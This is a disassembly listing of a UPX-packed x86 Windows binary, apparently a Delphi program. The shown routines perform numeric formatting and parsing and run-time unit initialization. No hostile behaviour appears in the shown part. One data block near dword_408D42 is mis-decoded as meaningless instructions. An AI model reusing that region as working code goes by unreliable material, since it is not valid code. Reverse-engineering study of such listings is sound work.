loc_408CC8: ; CODE XREF: sub_408C78+55�j
stosb
dec edx
jz short locret_408CD8
inc ecx
jnz short loc_408CC8
loc_408CCF: ; CODE XREF: sub_408C78+4C�j
; sub_408C78+5E�j
call sub_408B8B
stosb
dec edx
jnz short loc_408CCF
locret_408CD8: ; CODE XREF: sub_408C78+44�j
; sub_408C78+52�j
retn
sub_408C78 endp
; =============== S U B R O U T I N E =======================================
sub_408CD9 proc near ; CODE XREF: sub_408AD6:loc_408B62�p
; DATA XREF: UPX0:00408B87�o
xor ebx, ebx
mov bl, byte_40C4F4
mov ecx, 3
cmp byte ptr [ebp-1Ah], 0
jz short loc_408CF7
mov bl, byte_40C4F5
mov ecx, 40Fh
loc_408CF7: ; CODE XREF: sub_408CD9+11�j
cmp bl, cl
jbe short loc_408CFD
mov bl, cl
loc_408CFD: ; CODE XREF: sub_408CD9+20�j
add bl, ch
lea ebx, dword_408D42[ebx+ebx*4]
mov ecx, 5
loc_408D0B: ; CODE XREF: sub_408CD9+54�j
mov al, [ebx]
cmp al, 40h
jz short locret_408D2F
push ecx
push ebx
cmp al, 24h
jz short loc_408D1E
cmp al, 2Ah
jz short loc_408D25
stosb
jmp short loc_408D2A
; ---------------------------------------------------------------------------
loc_408D1E: ; CODE XREF: sub_408CD9+3C�j
call sub_408D30
jmp short loc_408D2A
; ---------------------------------------------------------------------------
loc_408D25: ; CODE XREF: sub_408CD9+40�j
call sub_408C78
loc_408D2A: ; CODE XREF: sub_408CD9+43�j
; sub_408CD9+4A�j
pop ebx
pop ecx
inc ebx
loop loc_408D0B
locret_408D2F: ; CODE XREF: sub_408CD9+36�j
retn
sub_408CD9 endp
; =============== S U B R O U T I N E =======================================
sub_408D30 proc near ; CODE XREF: sub_408CD9:loc_408D1E�p
push esi
mov esi, dword_40C4F0
test esi, esi
jz short loc_408D40
mov ecx, [esi-4]
rep movsb
loc_408D40: ; CODE XREF: sub_408D30+9�j
pop esi
retn
sub_408D30 endp
; ---------------------------------------------------------------------------
dword_408D42 dd 40402A24h ; ---------------------------------------------------------------------------
inc eax
sub ah, [eax+eax*2]
inc eax
inc eax
and al, 20h
sub al, [eax+40h]
sub ah, [eax]
and al, 40h
inc eax
sub [edx+ebp], ah
sub [eax+2Dh], eax
and al, 2Ah
inc eax
inc eax
and al, 2Dh
sub al, [eax+40h]
and al, 2Ah
sub eax, 2A284040h
and al, 29h
inc eax
sub eax, 4040242Ah
sub ch, ds:2A404024h
and al, 2Dh
inc eax
inc eax
sub eax, 4024202Ah
sub eax, 402A2024h
sub ah, [eax]
and al, 2Dh
inc eax
and al, 20h
sub ch, ds:2D202440h
sub al, [eax+2Ah]
sub eax, 28402420h
and al, 20h
sub ch, [ecx]
sub [edx], ch
and [ecx+ebp], ah
push ebp
mov ebp, esp
sub esp, 40h
push edi
push esi
push ebx
mov [ebp-4], eax
mov edi, edx
mov ebx, ecx
mov ecx, 2
cmp bl, 0
jz short loc_408DCF
mov eax, [edi]
or eax, [edi+4]
jz short loc_408DE1
mov ecx, [edi+4]
shr ecx, 1Fh
jmp short loc_408DE1
; ---------------------------------------------------------------------------
loc_408DCF: ; CODE XREF: UPX0:00408DBE�j
movzx eax, word ptr [edi+8]
or eax, [edi]
or eax, [edi+4]
jz short loc_408DE1
movzx ecx, word ptr [edi+8]
shr ecx, 0Fh
loc_408DE1: ; CODE XREF: UPX0:00408DC5�j
; UPX0:00408DCD�j ...
call sub_408E72
jz short loc_408E34
call sub_408EAD
mov eax, [ebp-14h]
mov edx, 270Fh
cmp byte ptr [ebp-0Ch], 0
jnz short loc_408E05
sub eax, [ebp-18h]
mov edx, eax
mov eax, 12h
loc_408E05: ; CODE XREF: UPX0:00408DF9�j
push eax
push edx
lea eax, [ebp-40h]
mov edx, edi
mov ecx, ebx
call sub_409079
mov ax, [ebp-40h]
cmp ax, 8000h
jz short loc_408E34
cmp ax, 7FFFh
jz short loc_408E34
cmp bl, 0
jnz short loc_408E48
cmp ax, 12h
jle short loc_408E48
cmp byte ptr [ebp-0Ch], 0
jnz short loc_408E48
loc_408E34: ; CODE XREF: UPX0:00408DE6�j
; UPX0:00408E1B�j ...
push 0
push 0Fh
push 0
mov eax, [ebp-4]
mov edx, edi
mov ecx, ebx
call sub_408AD6
jmp short loc_408E69
; ---------------------------------------------------------------------------
loc_408E48: ; CODE XREF: UPX0:00408E26�j
; UPX0:00408E2C�j ...
cmp byte ptr [ebp-3Dh], 0
jnz short loc_408E64
mov ecx, 2
call sub_408E72
jz short loc_408E34
cmp esi, [ebp-10h]
jz short loc_408E64
call sub_408EAD
loc_408E64: ; CODE XREF: UPX0:00408E4C�j
; UPX0:00408E5D�j
call sub_408F58
loc_408E69: ; CODE XREF: UPX0:00408E46�j
pop ebx
pop esi
pop edi
mov esp, ebp
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_408E72 proc near ; CODE XREF: UPX0:loc_408DE1�p
; UPX0:00408E53�p
mov esi, [ebp+8]
jecxz short loc_408E94
loc_408E77: ; CODE XREF: sub_408E72+14�j
; sub_408E72+16�j ...
lodsb
cmp al, 27h
jz short loc_408EA0
cmp al, 22h
jz short loc_408EA0
or al, al
jz short loc_408E94
cmp al, 3Bh
jnz short loc_408E77
loop loc_408E77
mov al, [esi]
or al, al
jz short loc_408E94
cmp al, 3Bh
jnz short locret_408E9F
loc_408E94: ; CODE XREF: sub_408E72+3�j
; sub_408E72+10�j ...
mov esi, [ebp+8]
mov al, [esi]
or al, al
jz short locret_408E9F
cmp al, 3Bh
locret_408E9F: ; CODE XREF: sub_408E72+20�j
; sub_408E72+29�j
retn
; ---------------------------------------------------------------------------
loc_408EA0: ; CODE XREF: sub_408E72+8�j
; sub_408E72+C�j
mov ah, al
loc_408EA2: ; CODE XREF: sub_408E72+37�j
lodsb
cmp al, ah
jz short loc_408E77
or al, al
jnz short loc_408EA2
jmp short loc_408E94
sub_408E72 endp
; =============== S U B R O U T I N E =======================================
sub_408EAD proc near ; CODE XREF: UPX0:00408DE8�p
; UPX0:00408E5F�p
push ebx
mov [ebp-10h], esi
mov ebx, 7FFFh
xor ecx, ecx
xor edx, edx
mov dword ptr [ebp-18h], 0FFFFFFFFh
mov [ebp-8], dl
mov [ebp-0Ch], dl
loc_408EC7: ; CODE XREF: sub_408EAD+41�j
; sub_408EAD+46�j ...
lodsb
loc_408EC8: ; CODE XREF: sub_408EAD+78�j
; sub_408EAD+83�j
cmp al, 23h
jz short loc_408EF2
cmp al, 30h
jz short loc_408EF5
cmp al, 2Eh
jz short loc_408F00
cmp al, 2Ch
jz short loc_408F0B
cmp al, 27h
jz short loc_408F11
cmp al, 22h
jz short loc_408F11
cmp al, 45h
jz short loc_408F1E
cmp al, 65h
jz short loc_408F1E
cmp al, 3Bh
jz short loc_408F32
or al, al
jnz short loc_408EC7
jmp short loc_408F32
; ---------------------------------------------------------------------------
loc_408EF2: ; CODE XREF: sub_408EAD+1D�j
inc edx
jmp short loc_408EC7
; ---------------------------------------------------------------------------
loc_408EF5: ; CODE XREF: sub_408EAD+21�j
cmp edx, ebx
jge short loc_408EFB
mov ebx, edx
loc_408EFB: ; CODE XREF: sub_408EAD+4A�j
inc edx
mov ecx, edx
jmp short loc_408EC7
; ---------------------------------------------------------------------------
loc_408F00: ; CODE XREF: sub_408EAD+25�j
cmp dword ptr [ebp-18h], 0FFFFFFFFh
jnz short loc_408EC7
mov [ebp-18h], edx
jmp short loc_408EC7
; ---------------------------------------------------------------------------
loc_408F0B: ; CODE XREF: sub_408EAD+29�j
mov byte ptr [ebp-8], 1
jmp short loc_408EC7
; ---------------------------------------------------------------------------
loc_408F11: ; CODE XREF: sub_408EAD+2D�j
; sub_408EAD+31�j
mov ah, al
loc_408F13: ; CODE XREF: sub_408EAD+6D�j
lodsb
cmp al, ah
jz short loc_408EC7
or al, al
jnz short loc_408F13
jmp short loc_408F32
; ---------------------------------------------------------------------------
loc_408F1E: ; CODE XREF: sub_408EAD+35�j
; sub_408EAD+39�j
lodsb
cmp al, 2Dh
jz short loc_408F27
cmp al, 2Bh
jnz short loc_408EC8
loc_408F27: ; CODE XREF: sub_408EAD+74�j
mov byte ptr [ebp-0Ch], 1
loc_408F2B: ; CODE XREF: sub_408EAD+81�j
lodsb
cmp al, 30h
jz short loc_408F2B
jmp short loc_408EC8
; ---------------------------------------------------------------------------
loc_408F32: ; CODE XREF: sub_408EAD+3D�j
; sub_408EAD+43�j ...
mov [ebp-14h], edx
cmp dword ptr [ebp-18h], 0FFFFFFFFh
jnz short loc_408F3E
mov [ebp-18h], edx
loc_408F3E: ; CODE XREF: sub_408EAD+8C�j
mov eax, [ebp-18h]
sub eax, ecx
jle short loc_408F47
xor eax, eax
loc_408F47: ; CODE XREF: sub_408EAD+96�j
mov [ebp-20h], eax
mov eax, [ebp-18h]
sub eax, ebx
jge short loc_408F53
xor eax, eax
loc_408F53: ; CODE XREF: sub_408EAD+A2�j
mov [ebp-1Ch], eax
pop ebx
retn
sub_408EAD endp
; =============== S U B R O U T I N E =======================================
sub_408F58 proc near ; CODE XREF: UPX0:loc_408E64�p
cmp byte ptr [ebp-0Ch], 0
jz short loc_408F65
mov eax, [ebp-18h]
xor edx, edx
jmp short loc_408F78
; ---------------------------------------------------------------------------
loc_408F65: ; CODE XREF: sub_408F58+4�j
movsx eax, word ptr [ebp-40h]
cmp eax, [ebp-18h]
jg short loc_408F71
mov eax, [ebp-18h]
loc_408F71: ; CODE XREF: sub_408F58+14�j
movsx edx, word ptr [ebp-40h]
sub edx, [ebp-18h]
loc_408F78: ; CODE XREF: sub_408F58+B�j
mov [ebp-24h], eax
mov [ebp-28h], edx
mov esi, [ebp-10h]
mov edi, [ebp-4]
lea ebx, [ebp-3Dh]
cmp byte ptr [ebp-3Eh], 0
jz short loc_408F95
cmp esi, [ebp+8]
jnz short loc_408F95
mov al, 2Dh
stosb
loc_408F95: ; CODE XREF: sub_408F58+33�j
; sub_408F58+38�j ...
lodsb
cmp al, 23h
jz short loc_408FC1
cmp al, 30h
jz short loc_408FC1
cmp al, 2Eh
jz short loc_408F95
cmp al, 2Ch
jz short loc_408F95
cmp al, 27h
jz short loc_408FC8
cmp al, 22h
jz short loc_408FC8
cmp al, 45h
jz short loc_408FD6
cmp al, 65h
jz short loc_408FD6
cmp al, 3Bh
jz short loc_40900D
or al, al
jz short loc_40900D
loc_408FBE: ; CODE XREF: sub_408F58+88�j
stosb
jmp short loc_408F95
; ---------------------------------------------------------------------------
loc_408FC1: ; CODE XREF: sub_408F58+40�j
; sub_408F58+44�j
call sub_409013
jmp short loc_408F95
; ---------------------------------------------------------------------------
loc_408FC8: ; CODE XREF: sub_408F58+50�j
; sub_408F58+54�j
mov ah, al
loc_408FCA: ; CODE XREF: sub_408F58+7C�j
lodsb
cmp al, ah
jz short loc_408F95
or al, al
jz short loc_40900D
stosb
jmp short loc_408FCA
; ---------------------------------------------------------------------------
loc_408FD6: ; CODE XREF: sub_408F58+58�j
; sub_408F58+5C�j
mov ah, [esi]
cmp ah, 2Bh
jz short loc_408FE4
cmp ah, 2Dh
jnz short loc_408FBE
xor ah, ah
loc_408FE4: ; CODE XREF: sub_408F58+83�j
mov ecx, 0FFFFFFFFh
loc_408FE9: ; CODE XREF: sub_408F58+96�j
inc ecx
inc esi
cmp byte ptr [esi], 30h
jz short loc_408FE9
cmp ecx, 4
jb short loc_408FFA
mov ecx, 4
loc_408FFA: ; CODE XREF: sub_408F58+9B�j
push ebx
mov bl, [ebp-3Dh]
movsx edx, word ptr [ebp-40h]
sub edx, [ebp-18h]
call sub_408C34
pop ebx
jmp short loc_408F95
; ---------------------------------------------------------------------------
loc_40900D: ; CODE XREF: sub_408F58+60�j
; sub_408F58+64�j ...
mov eax, edi
sub eax, [ebp-4]
retn
sub_408F58 endp
; =============== S U B R O U T I N E =======================================
sub_409013 proc near ; CODE XREF: sub_408F58:loc_408FC1�p
cmp dword ptr [ebp-28h], 0
jz short sub_409034
jl short loc_409027
loc_40901B: ; CODE XREF: sub_409013+10�j
call sub_409034
dec dword ptr [ebp-28h]
jnz short loc_40901B
jmp short sub_409034
; ---------------------------------------------------------------------------
loc_409027: ; CODE XREF: sub_409013+6�j
inc dword ptr [ebp-28h]
mov eax, [ebp-24h]
cmp eax, [ebp-1Ch]
jle short loc_409044
jmp short loc_409075
sub_409013 endp
; =============== S U B R O U T I N E =======================================
sub_409034 proc near ; CODE XREF: sub_409013+4�j
; sub_409013:loc_40901B�p ...
mov al, [ebx]
inc ebx
or al, al
jnz short loc_409046
dec ebx
mov eax, [ebp-24h]
cmp eax, [ebp-20h]
jle short loc_409075
loc_409044: ; CODE XREF: sub_409013+1D�j
mov al, 30h
loc_409046: ; CODE XREF: sub_409034+5�j
cmp dword ptr [ebp-24h], 0
jnz short loc_409057
mov ah, al
mov al, byte_40C4F7
stosw
jmp short loc_409075
; ---------------------------------------------------------------------------
loc_409057: ; CODE XREF: sub_409034+16�j
stosb
cmp byte ptr [ebp-8], 0
jz short loc_409075
mov eax, [ebp-24h]
cmp eax, 1
jle short loc_409075
mov dl, 3
div dl
cmp ah, 1
jnz short loc_409075
mov al, byte_40C4F6
stosb
loc_409075: ; CODE XREF: sub_409013+1F�j
; sub_409034+E�j ...
dec dword ptr [ebp-24h]
retn
sub_409034 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409079 proc near ; CODE XREF: sub_408AD6+43�p
; UPX0:00408E0E�p
push ebp
mov ebp, esp
sub esp, 1Ah
push edi
push esi
push ebx
mov ebx, eax
mov esi, edx
cmp cl, 0
jz short loc_409092
call sub_4091A7
jmp short loc_409097
; ---------------------------------------------------------------------------
loc_409092: ; CODE XREF: sub_409079+10�j
call sub_4090A0
loc_409097: ; CODE XREF: sub_409079+17�j
pop ebx
pop esi
pop edi
mov esp, ebp
pop ebp
retn 8
sub_409079 endp
; =============== S U B R O U T I N E =======================================
sub_4090A0 proc near ; CODE XREF: sub_409079:loc_409092�p
mov ax, [esi+8]
mov edx, eax
and eax, 7FFFh
jz short loc_4090CB
cmp eax, 7FFFh
jnz short loc_4090D6
test word ptr [esi+6], 8000h
jz short loc_4090CD
cmp dword ptr [esi], 0
jnz short loc_4090CA
cmp dword ptr [esi+4], 80000000h
jz short loc_4090CD
loc_4090CA: ; CODE XREF: sub_4090A0+1F�j
inc eax
loc_4090CB: ; CODE XREF: sub_4090A0+B�j
; sub_4090A0+A7�j
xor edx, edx
loc_4090CD: ; CODE XREF: sub_4090A0+1A�j
; sub_4090A0+28�j
mov byte ptr [ebx+3], 0
jmp loc_409198
; ---------------------------------------------------------------------------
loc_4090D6: ; CODE XREF: sub_4090A0+12�j
fld tbyte ptr [esi]
sub eax, 3FFFh
imul eax, 4D10h
sar eax, 10h
inc eax
mov [ebp-8], eax
mov eax, 12h
sub eax, [ebp-8]
fabs
call sub_404E30
frndint
fld tbyte_408AC4
fcomp st(1)
fstsw word ptr [ebp-4]
wait
test word ptr [ebp-4], 4100h
jz short loc_409119
fidiv dword_408AB4
inc dword ptr [ebp-8]
loc_409119: ; CODE XREF: sub_4090A0+6E�j
fbstp tbyte ptr [ebp-1Ah]
lea edi, [ebx+3]
mov edx, 9
wait
loc_409125: ; CODE XREF: sub_4090A0+98�j
mov al, [ebp+edx-1Bh]
mov ah, al
shr al, 4
and ah, 0Fh
add ax, 3030h
stosw
dec edx
jnz short loc_409125
xor al, al
stosb
mov edi, [ebp-8]
add edi, [ebp+8]
jns short loc_409149
xor eax, eax
jmp short loc_4090CB
; ---------------------------------------------------------------------------
loc_409149: ; CODE XREF: sub_4090A0+A3�j
cmp edi, [ebp+0Ch]
jb short loc_409151
mov edi, [ebp+0Ch]
loc_409151: ; CODE XREF: sub_4090A0+AC�j
cmp edi, 12h
jnb short loc_40917D
cmp byte ptr [ebx+edi+3], 35h
jb short loc_409182
loc_40915D: ; CODE XREF: sub_4090A0+CE�j
mov byte ptr [ebx+edi+3], 0
dec edi
js short loc_409172
inc byte ptr [ebx+edi+3]
cmp byte ptr [ebx+edi+3], 39h
ja short loc_40915D
jmp short loc_409191
; ---------------------------------------------------------------------------
loc_409172: ; CODE XREF: sub_4090A0+C3�j
mov word ptr [ebx+3], 31h
inc dword ptr [ebp-8]
jmp short loc_409191
; ---------------------------------------------------------------------------
loc_40917D: ; CODE XREF: sub_4090A0+B4�j
mov edi, 12h
loc_409182: ; CODE XREF: sub_4090A0+BB�j
; sub_4090A0+EF�j
mov byte ptr [ebx+edi+3], 0
dec edi
js short loc_4091A3
cmp byte ptr [ebx+edi+3], 30h
jz short loc_409182
loc_409191: ; CODE XREF: sub_4090A0+D0�j
; sub_4090A0+DB�j
mov dx, [esi+8]
loc_409195: ; CODE XREF: sub_4090A0+105�j
mov eax, [ebp-8]
loc_409198: ; CODE XREF: sub_4090A0+31�j
shr dx, 0Fh
mov [ebx], ax
mov [ebx+2], dl
retn
; ---------------------------------------------------------------------------
loc_4091A3: ; CODE XREF: sub_4090A0+E8�j
xor edx, edx
jmp short loc_409195
sub_4090A0 endp
; =============== S U B R O U T I N E =======================================
sub_4091A7 proc near ; CODE XREF: sub_409079+12�p
mov eax, [esi]
mov edx, [esi+4]
mov ecx, eax
or ecx, edx
jz loc_40926A
or edx, edx
jns short loc_4091C1
neg edx
neg eax
sbb edx, 0
loc_4091C1: ; CODE XREF: sub_4091A7+11�j
xor ecx, ecx
mov edi, [ebp+8]
or edi, edi
jge short loc_4091CC
xor edi, edi
loc_4091CC: ; CODE XREF: sub_4091A7+21�j
cmp edi, 4
jl short loc_4091F0
mov edi, 4
loc_4091D6: ; CODE XREF: sub_4091A7+3B�j
inc ecx
sub eax, 0A7640000h
sbb edx, 0DE0B6B3h
jnb short loc_4091D6
dec ecx
add eax, 0A7640000h
adc edx, 0DE0B6B3h
loc_4091F0: ; CODE XREF: sub_4091A7+28�j
mov [ebp-10h], eax
mov [ebp-0Ch], edx
fild qword ptr [ebp-10h]
mov edx, edi
mov eax, 4
sub eax, edx
jz short loc_40920B
fidiv flt_408AB0[eax*4]
loc_40920B: ; CODE XREF: sub_4091A7+5B�j
fbstp tbyte ptr [ebp-1Ah]
lea edi, [ebx+3]
wait
or ecx, ecx
jnz short loc_409231
mov ecx, 9
loc_40921B: ; CODE XREF: sub_4091A7+86�j
mov al, [ebp+ecx-1Bh]
mov ah, al
shr al, 4
jnz short loc_409244
mov al, ah
and al, 0Fh
jnz short loc_40924B
dec ecx
jnz short loc_40921B
jmp short loc_40926A
; ---------------------------------------------------------------------------
loc_409231: ; CODE XREF: sub_4091A7+6D�j
mov al, cl
add al, 30h
stosb
mov ecx, 9
loc_40923B: ; CODE XREF: sub_4091A7+A8�j
mov al, [ebp+ecx-1Bh]
mov ah, al
shr al, 4
loc_409244: ; CODE XREF: sub_4091A7+7D�j
add al, 30h
stosb
mov al, ah
and al, 0Fh
loc_40924B: ; CODE XREF: sub_4091A7+83�j
add al, 30h
stosb
dec ecx
jnz short loc_40923B
mov eax, edi
lea ecx, [ebx+edx+3]
sub eax, ecx
loc_409259: ; CODE XREF: sub_4091A7+B9�j
mov byte ptr [edi], 0
dec edi
cmp byte ptr [edi], 30h
jz short loc_409259
mov edx, [esi+4]
shr edx, 1Fh
jmp short loc_409271
; ---------------------------------------------------------------------------
loc_40926A: ; CODE XREF: sub_4091A7+9�j
; sub_4091A7+88�j
xor eax, eax
xor edx, edx
mov [ebx+3], al
loc_409271: ; CODE XREF: sub_4091A7+C1�j
mov [ebx], ax
mov [ebx+2], dl
retn
sub_4091A7 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 6
push edi
push esi
push ebx
mov esi, eax
mov edi, edx
mov ebx, ecx
fstcw word ptr [ebp-6]
fclex
fldcw word_408ACE
fldz
call sub_409323
mov bh, [esi]
cmp bh, 2Bh
jz short loc_4092A7
cmp bh, 2Dh
jnz short loc_4092A8
loc_4092A7: ; CODE XREF: UPX0:004092A0�j
inc esi
loc_4092A8: ; CODE XREF: UPX0:004092A5�j
mov ecx, esi
call sub_40932E
xor edx, edx
mov al, [esi]
cmp al, byte_40C4F7
jnz short loc_4092C3
inc esi
call sub_40932E
neg edx
loc_4092C3: ; CODE XREF: UPX0:004092B9�j
cmp ecx, esi
jz short loc_409311
mov al, [esi]
and al, 0DFh
cmp al, 45h
jnz short loc_4092D9
inc esi
push edx
call sub_40934A
pop eax
add edx, eax
loc_4092D9: ; CODE XREF: UPX0:004092CD�j
call sub_409323
cmp byte ptr [esi], 0
jnz short loc_409311
mov eax, edx
cmp bl, 1
jnz short loc_4092ED
add eax, 4
loc_4092ED: ; CODE XREF: UPX0:004092E8�j
call sub_404E30
cmp bh, 2Dh
jnz short loc_4092F9
fchs
loc_4092F9: ; CODE XREF: UPX0:004092F5�j
cmp bl, 0
jz short loc_409302
fistp qword ptr [edi]
jmp short loc_409304
; ---------------------------------------------------------------------------
loc_409302: ; CODE XREF: UPX0:004092FC�j
fstp tbyte ptr [edi]
loc_409304: ; CODE XREF: UPX0:00409300�j
fstsw ax
test ax, 9
jnz short loc_409313
mov al, 1
jmp short loc_409315
; ---------------------------------------------------------------------------
loc_409311: ; CODE XREF: UPX0:004092C5�j
; UPX0:004092E1�j
fstp st
loc_409313: ; CODE XREF: UPX0:0040930B�j
xor eax, eax
loc_409315: ; CODE XREF: UPX0:0040930F�j
fclex
fldcw word ptr [ebp-6]
wait
pop ebx
pop esi
pop edi
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
sub_409323 proc near ; CODE XREF: UPX0:00409296�p
; UPX0:loc_4092D9�p ...
lodsb
or al, al
jz short loc_40932C
cmp al, 20h
jz short sub_409323
loc_40932C: ; CODE XREF: sub_409323+3�j
dec esi
retn
sub_409323 endp
; =============== S U B R O U T I N E =======================================
sub_40932E proc near ; CODE XREF: UPX0:004092AA�p
; UPX0:004092BC�p
xor eax, eax
xor edx, edx
loc_409332: ; CODE XREF: sub_40932E+18�j
lodsb
sub al, 3Ah
add al, 0Ah
jnb short loc_409348
fimul dword_408AB4
mov [ebp-4], eax
fiadd dword ptr [ebp-4]
inc edx
jmp short loc_409332
; ---------------------------------------------------------------------------
loc_409348: ; CODE XREF: sub_40932E+9�j
dec esi
retn
sub_40932E endp
; =============== S U B R O U T I N E =======================================
sub_40934A proc near ; CODE XREF: UPX0:004092D1�p
xor eax, eax
xor edx, edx
mov cl, [esi]
cmp cl, 2Bh
jz short loc_40935A
cmp cl, 2Dh
jnz short loc_40935B
loc_40935A: ; CODE XREF: sub_40934A+9�j
inc esi
loc_40935B: ; CODE XREF: sub_40934A+E�j
; sub_40934A+25�j
mov al, [esi]
sub al, 3Ah
add al, 0Ah
jnb short loc_409371
inc esi
imul edx, 0Ah
add edx, eax
cmp edx, 1F4h
jb short loc_40935B
loc_409371: ; CODE XREF: sub_40934A+17�j
cmp cl, 2Dh
jnz short locret_409378
neg edx
locret_409378: ; CODE XREF: sub_40934A+2A�j
retn
sub_40934A endp
; ---------------------------------------------------------------------------
align 4
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_4094B2
push dword ptr fs:[eax]
mov fs:[eax], esp
inc dword_40C5F8
jnz loc_4094A4
mov eax, offset dword_40C604
call sub_4087D4
call sub_408758
call sub_4080D4
mov eax, offset off_40B208
mov ecx, 16h
mov edx, off_407B64
call sub_40387C
mov eax, offset dword_40B1D0
mov ecx, 7
mov edx, off_407AE4
call sub_40387C
mov eax, offset off_40B128
call sub_4031C8
mov eax, offset dword_40C5BC
mov ecx, 7
mov edx, off_401000
call sub_40387C
mov eax, offset dword_40C594
mov ecx, 7
mov edx, off_401000
call sub_40387C
mov eax, offset dword_40C578
mov ecx, 7
mov edx, off_401000
call sub_40387C
mov eax, offset dword_40C548
mov ecx, 0Ch
mov edx, off_401000
call sub_40387C
mov eax, offset dword_40C518
mov ecx, 0Ch
mov edx, off_401000
call sub_40387C
mov eax, offset dword_40C514
call sub_4031C8
mov eax, offset dword_40C510
call sub_4031C8
mov eax, offset dword_40C50C
call sub_4031C8
mov eax, offset dword_40C508
call sub_4031C8
mov eax, offset dword_40C500
call sub_4031C8
mov eax, offset dword_40C4FC
call sub_4031C8
mov eax, offset dword_40C4F0
call sub_4031C8
mov eax, offset dword_40B0D4
call sub_4031C8
mov eax, offset dword_40B0C0
call sub_4031C8
loc_4094A4: ; CODE XREF: UPX0:00409393�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4094B9
loc_4094B1: ; CODE XREF: UPX0:004094B7�j
retn
; ---------------------------------------------------------------------------
loc_4094B2: ; DATA XREF: UPX0:00409382�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_4094B1
; ---------------------------------------------------------------------------
loc_4094B9: ; CODE XREF: UPX0:loc_4094B1�j
; DATA XREF: UPX0:004094AC�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_409524
push dword ptr fs:[eax]
mov fs:[eax], esp
sub dword_40C5F8, 1
jnb short loc_409516
mov eax, offset dword_4087E4
call sub_402FD0
mov eax, offset dword_4088D0
call sub_402FEC
cmp byte_40C4D1, 0
jz short loc_409502
mov eax, offset off_40B128
mov edx, offset dword_409538
call sub_40321C
loc_409502: ; CODE XREF: UPX0:004094F1�j
call sub_408008
call sub_4083E0
call sub_408140
call sub_408778
loc_409516: ; CODE XREF: UPX0:004094D4�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40952B
loc_409523: ; CODE XREF: UPX0:00409529�j
retn
; ---------------------------------------------------------------------------
loc_409524: ; DATA XREF: UPX0:004094C2�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_409523
; ---------------------------------------------------------------------------
loc_40952B: ; CODE XREF: UPX0:loc_409523�j
; DATA XREF: UPX0:0040951E�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
dd 0FFFFFFFFh, 2
dword_409538 dd 7830h ; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_409561
push dword ptr fs:[eax]
mov fs:[eax], esp
inc dword_40C608
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_409568
loc_409560: ; CODE XREF: UPX0:00409566�j
retn
; ---------------------------------------------------------------------------
loc_409561: ; DATA XREF: UPX0:00409542�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_409560
; ---------------------------------------------------------------------------
loc_409568: ; CODE XREF: UPX0:loc_409560�j
; DATA XREF: UPX0:0040955B�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
sub dword_40C608, 1
retn
; ---------------------------------------------------------------------------
off_409574 dd offset dword_409578 ; DATA XREF: sub_409BA8+17�r
; sub_409BA8+2E0�r ...
dword_409578 dd 61740C0Eh, 43584567h, 4E495045h, 204F46h, 30000h, 100C0000h
; DATA XREF: UPX0:off_409574�o
dd 40040h, 100C0000h, 80040h, 100C0000h, 0C0040h, 0C08B0000h
dd 0D29425FFh, 0C08B0040h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4095B0 proc near ; CODE XREF: UPX0:0040A3CA�p
jmp ds:dword_40D290
sub_4095B0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4095B8 proc near ; CODE XREF: sub_409BA8+2BF�p
; sub_40A228+8E�p
jmp ds:dword_40D2A0
sub_4095B8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4095C0 proc near ; CODE XREF: sub_409AA8+31�p
jmp ds:dword_40D29C
sub_4095C0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4095C8 proc near ; CODE XREF: sub_40998C+5�p
; sub_40A304+2F�p ...
test eax, 80000000h
setz al
retn
sub_4095C8 endp
; ---------------------------------------------------------------------------
align 4
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_4095F9
push dword ptr fs:[eax]
mov fs:[eax], esp
inc dword_40C60C
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_409600
loc_4095F8: ; CODE XREF: UPX0:004095FE�j
retn
; ---------------------------------------------------------------------------
loc_4095F9: ; DATA XREF: UPX0:004095DA�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_4095F8
; ---------------------------------------------------------------------------
loc_409600: ; CODE XREF: UPX0:loc_4095F8�j
; DATA XREF: UPX0:004095F3�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
sub dword_40C60C, 1
retn
; ---------------------------------------------------------------------------
off_40960C dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B338�o
dd 0FFA1h
off_409614 dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B424�o
dd 0FFA2h
off_40961C dd offset dword_40C4DC ; DATA XREF: UPX0:off_40B450�o
dd 0FFA3h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_409649
push dword ptr fs:[eax]
mov fs:[eax], esp
inc dword_40C610
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_409650
loc_409648: ; CODE XREF: UPX0:0040964E�j
retn
; ---------------------------------------------------------------------------
loc_409649: ; DATA XREF: UPX0:0040962A�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_409648
; ---------------------------------------------------------------------------
loc_409650: ; CODE XREF: UPX0:loc_409648�j
; DATA XREF: UPX0:00409643�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
sub dword_40C610, 1
retn
; ---------------------------------------------------------------------------
